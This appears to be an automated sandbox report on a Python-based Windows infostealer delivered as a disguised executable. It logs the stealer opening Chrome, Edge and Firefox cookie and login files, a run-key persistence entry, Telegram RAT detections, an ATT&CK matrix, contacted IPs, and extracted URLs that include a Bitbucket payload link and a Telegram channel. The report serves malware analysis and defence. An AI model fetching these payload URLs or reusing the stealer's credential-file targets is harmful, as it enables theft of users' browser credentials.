            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\base64mime.cpython-310.pyc.41705152 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\charset.cpython-310.pyc.41705048 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\encoders.cpython-310.pyc.41735840 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\quopri.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\quopri.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\quopri.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\quopri.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\quopri.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\quopri.cpython-310.pyc.28010880 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\email\__pycache__\utils.cpython-310.pyc.41677768 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\random.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\random.py VolumeInformation
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            Source: Yara matchFile source: 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\m8f4v4pw.default\logins.json
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\cmd.exeDirectory queried: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\DocumentsJump to behavior
            Source: Yara matchFile source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            Source: Yara matchFile source: 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: synaptics.exe PID: 3312, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            1
            Spearphishing Link
            1
            Command and Scripting Interpreter
            1
            Scripting
            11
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            1
            Security Software Discovery
            Remote Services11
            Data from Local System
            Data ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job111
            Registry Run Keys / Startup Folder
            111
            Registry Run Keys / Startup Folder
            1
            Modify Registry
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Process Injection
            Security Account Manager12
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Rundll32
            NTDS12
            System Information Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1554449 URL: https://t.ly/SjDNX Startdate: 12/11/2024 Architecture: WINDOWS Score: 88 100 Yara detected Braodo 2->100 102 Yara detected Telegram RAT 2->102 104 Sigma detected: New RUN Key Pointing to Suspicious Folder 2->104 106 5 other signatures 2->106 9 A vide k  s k pek gyujtem nye szerzoi jogv delem alatt  ll a szerzo  ltal..exe 2->9         started        11 chrome.exe 20 2->11         started        15 7zG.exe 10 2->15         started        17 2 other processes 2->17 process3 dnsIp4 19 cmd.exe 4 9->19         started        22 cmd.exe 2 2 9->22         started        84 192.168.2.16 unknown unknown 11->84 86 239.255.255.250 unknown Reserved 11->86 64 A vide.k .s k.pek ...zQ .ltal.zip (copy), Zip 11->64 dropped 24 chrome.exe 11->24         started        66 C:\Users\user\Downloads\...\vcruntime140.dll, PE32 15->66 dropped 68 C:\Users\user\Downloads\...\msimg32.dll, PE32 15->68 dropped 70 C:\Users\user\Downloads\...\Rar.exe, PE32+ 15->70 dropped 72 A vide k  s k pek ...a szerzo  ltal..exe, PE32 15->72 dropped file5 process6 dnsIp7 52 C:\Users\Public\Windows Security, ASCII 19->52 dropped 27 Rar.exe 1003 19->27         started        30 synaptics.exe 19->30         started        34 reg.exe 19->34         started        40 2 other processes 19->40 36 Acrobat.exe 22->36         started        38 conhost.exe 22->38         started        74 142.250.185.195 GOOGLEUS United States 24->74 76 142.250.185.227 GOOGLEUS United States 24->76 78 7 other IPs or domains 24->78 file8 process9 dnsIp10 54 C:\Users\Public\QExvbmVOb25l\synaptics.exe, PE32 27->54 dropped 56 C:\Users\Public\...\vcruntime140.dll, PE32 27->56 dropped 58 C:\Users\Public\QExvbmVOb25l\python310.dll, PE32 27->58 dropped 62 871 other files (none is malicious) 27->62 dropped 88 208.95.112.1 TUT-ASUS United States 30->88 90 149.154.167.220 TELEGRAMRU United Kingdom 30->90 92 2 other IPs or domains 30->92 108 Tries to harvest and steal browser information (history, passwords, etc) 30->108 110 Creates an autostart registry key pointing to binary in C:\Windows 34->110 42 AcroCEF.exe 36->42         started        45 AcroCEF.exe 36->45         started        60 C:\Users\Public\Windows Security.bat, Unicode 40->60 dropped file11 signatures12 process13 dnsIp14 80 199.232.210.172 FASTLYUS United States 42->80 82 2.23.197.184 CWVodafoneGroupPLCEU European Union 42->82 47 AcroCEF.exe 42->47         started        50 AcroCEF.exe 45->50         started        process15 dnsIp16 94 162.159.61.3 CLOUDFLARENETUS United States 47->94 96 54.144.73.197 AMAZON-AESUS United States 47->96 98 184.28.88.176 AKAMAI-ASUS United States 47->98

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://t.ly/SjDNX0%Avira URL Cloudsafe
            SourceDetectionScannerLabelLink
            C:\Users\Public\QExvbmVOb25l\DLLs\_asyncio.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_bz2.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_ctypes.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_decimal.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_elementtree.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_hashlib.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_lzma.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_msi.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_multiprocessing.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_overlapped.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_queue.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_socket.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_sqlite3.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_ssl.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_uuid.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\_zoneinfo.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\libcrypto-1_1.dll0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\libffi-7.dll0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\libssl-1_1.dll0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\pyexpat.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\select.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\sqlite3.dll0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\unicodedata.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\DLLs\winsound.pyd0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\__future__.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_aix_support.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_bootsubprocess.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_collections_abc.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_compression.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_markupbase.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_osx_support.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_py_abc.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_pyio.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_sitebuiltins.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_strptime.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_threading_local.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\_weakrefset.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\abc.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\aifc.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\argparse.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\ast.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\asynchat.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\asyncore.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\base64.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\datetime.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\dbm\__init__.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\dbm\dumb.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\dbm\gnu.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\dbm\ndbm.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\difflib.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\dis.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\doctest.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\_encoded_words.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\_header_value_parser.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\_policybase.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\base64mime.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\charset.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\contentmanager.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\encoders.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\errors.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\feedparser.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\generator.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\header.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\headerregistry.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\iterators.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\message.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\application.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\audio.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\base.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\image.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\message.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\multipart.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\nonmultipart.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\mime\text.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\parser.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\policy.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\quoprimime.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\email\utils.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\ascii.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\base64_codec.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\bz2_codec.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\charmap.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp037.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1006.py0%ReversingLabs
            C:\Users\Public\QExvbmVOb25l\Lib\encodings\cp1026.py0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)0%Avira URL Cloudsafe
            http://bugs.python.org/issue196190%Avira URL Cloudsafe
            https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap04.html#tag_04_13)0%Avira URL Cloudsafe
            https://bbc-frontbucket-static.stg-east.fro0%Avira URL Cloudsafe
            https://urllib3.readthedocs.io/en/latest0%Avira URL Cloudsafe
            http://bugs.python.org/issue14396.0%Avira URL Cloudsafe
            https://urllib3.readthedocs.io/e0%Avira URL Cloudsafe
            https://www.esat.kuleuven.be/cosic/publications/article-1432.pdf0%Avira URL Cloudsafe
            http://bugs.python.org/issue194040%Avira URL Cloudsafe
            https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/0%Avira URL Cloudsafe
            https://foss.heptapo0%Avira URL Cloudsafe
            http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest0%Avira URL Cloudsafe
            https://urllib3.readthedocs.io/en/latest/advanced-usage.html0%Avira URL Cloudsafe
            http://ocsp.accv.esi0%Avira URL Cloudsafe
            https://bugs.python.org/issue295850%Avira URL Cloudsafe
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabsynaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://ip-api.com/json/?fields=8195Zsynaptics.exe, 00000023.00000002.2508011307.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2326402328.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2442445774.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://github.com/urllib3/urllib3/issues/2168z(Andreysynaptics.exe, 00000023.00000003.1992460407.0000000002478000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988313998.0000000002478000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)synaptics.exe, 00000023.00000003.2034071702.0000000002113000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2054763098.000000000211A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://python.org/dev/peps/pep-0263/Rar.exe, 00000016.00000003.1867329681.00000246C1DDC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://t.me/LoneNoneHsynaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045CB000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://csrc.nist.gov/publications/nistpubssynaptics.exe, 00000023.00000002.2487881140.00000000023A4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2444595431.00000000023AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023A1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/openssl/openssl/blob/master/include/openssl/pem.hsynaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/synaptics.exe, 00000023.00000003.2053651117.0000000001F8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://bitbucket.org/lonenone111/adonis/raw/9b4527441ae340366161f4f5c7b718a3e2d967fd/Adonis_Pure_B6synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://bugs.python.org/issue19619synaptics.exe, 00000023.00000003.1885432522.0000000000CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/urllib3/urllib3/pull/2624synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://tools.ietf.org/html/rfc7230#section-3.2.4synaptics.exe, 00000023.00000003.2016874067.0000000002131000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2019530310.0000000002099000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963synaptics.exe, 00000023.00000003.2030551439.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2504866090.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.000000000218C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://aui-cdn.atlassian.com/synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://tools.ietf.org/html/rfc3610synaptics.exe, 00000023.00000003.2245770456.00000000021D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2240278565.0000000004971000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.dhimyotis.com/certignarootca.crlsynaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://curl.haxx.se/rfc/cookie_spec.htmlsynaptics.exe, 00000023.00000003.2108776953.0000000001F7E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108776953.0000000001F92000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2103638638.0000000001F71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2106086828.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108461816.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2112701662.0000000001F61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
